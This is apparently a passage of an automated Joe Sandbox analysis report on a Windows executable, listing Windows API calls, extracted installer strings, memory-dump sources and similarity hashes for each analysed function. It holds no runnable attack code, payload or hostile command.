                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                                                                            • API String ID: 2171350718-461813615
                                                                                                                                                            • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                                                            • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                                                                                                                            • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                                                            • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                                                                                                                            APIs
                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\87h216Snb7.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                                                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\87h216Snb7.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                                                                                                            • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                                                                                                            Strings
                                                                                                                                                            • "C:\Users\user\Desktop\87h216Snb7.exe", xrefs: 00406833
                                                                                                                                                            • *?|<>/":, xrefs: 00406841
                                                                                                                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004067F0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                            • String ID: "C:\Users\user\Desktop\87h216Snb7.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                                            • API String ID: 589700163-660138825
                                                                                                                                                            • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                            • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                                                                                                                            • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                            • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                                                                                                                            APIs
                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00404582
                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 0040459A
                                                                                                                                                            • GetSysColor.USER32(?), ref: 004045AD
                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 004045BD
                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004045D7
                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                            • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                                                                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                            • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                                                                                                                            APIs
                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                                                                                                              • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                            • String ID: 9
                                                                                                                                                            • API String ID: 163830602-2366072709
                                                                                                                                                            • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                                                                                                            • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                                                                                                                                            • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                                                                                                            • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                                                                                                                                            APIs
                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                                                                                                                            • GetMessagePos.USER32 ref: 00404E9E
                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404EB8
                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                            • String ID: f
                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                            • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                                                                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                            • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                                                                                                                            APIs
                                                                                                                                                            • GetDC.USER32(?), ref: 00401E76
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                                                                                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                            • String ID: Tahoma
                                                                                                                                                            • API String ID: 3808545654-3580928618
                                                                                                                                                            • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                                                                                                            • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                                                                                                                            • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                                                                                                            • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                                                                                                                            APIs
                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                                                                                                            • MulDiv.KERNEL32(000E1352,00000064,000E1C48), ref: 00403001
                                                                                                                                                            • wsprintfW.USER32 ref: 00403011
                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00403021
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                                                                                                                            Strings
                                                                                                                                                            • verifying installer: %d%%, xrefs: 0040300B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                            • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                                                            • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                                                                                                                            • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                                                            • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                                                                                                                            APIs
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2667972263-0
                                                                                                                                                            • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                                                            • Instruction ID: 30dd54c89a4cddf194586c2a2fc5346a944fd6f702074eaf72055d986495362b
                                                                                                                                                            • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                                                                                            • Instruction Fuzzy Hash: 0C31B171D00128BBCF21AFA5DE49D9E7E79AF44324F20423AF415762E1CB798D418FA8
                                                                                                                                                            APIs
                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1354259210-0
                                                                                                                                                            • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                                            • Instruction ID: d442e96e729bea3163a88d870f4d25619929b9fa7009ff0cba57fd90435ded5e
                                                                                                                                                            • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                                            • Instruction Fuzzy Hash: 8B212A7150010ABFDF129F94CE89EEF7A7DEB54388F110076B909B21A0D7B58E54AA68
                                                                                                                                                            APIs
                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                            • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                                                                                                            • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                                                                                                                                            • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                                                                                                            • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                                                                                                                            APIs
                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                            • String ID: !
                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                            • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                                                                                                            • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                                                                                                                            • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                                                                                                            • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                                                                                                                            APIs
                                                                                                                                                            • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                                                                                                            • wsprintfW.USER32 ref: 00404E17
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
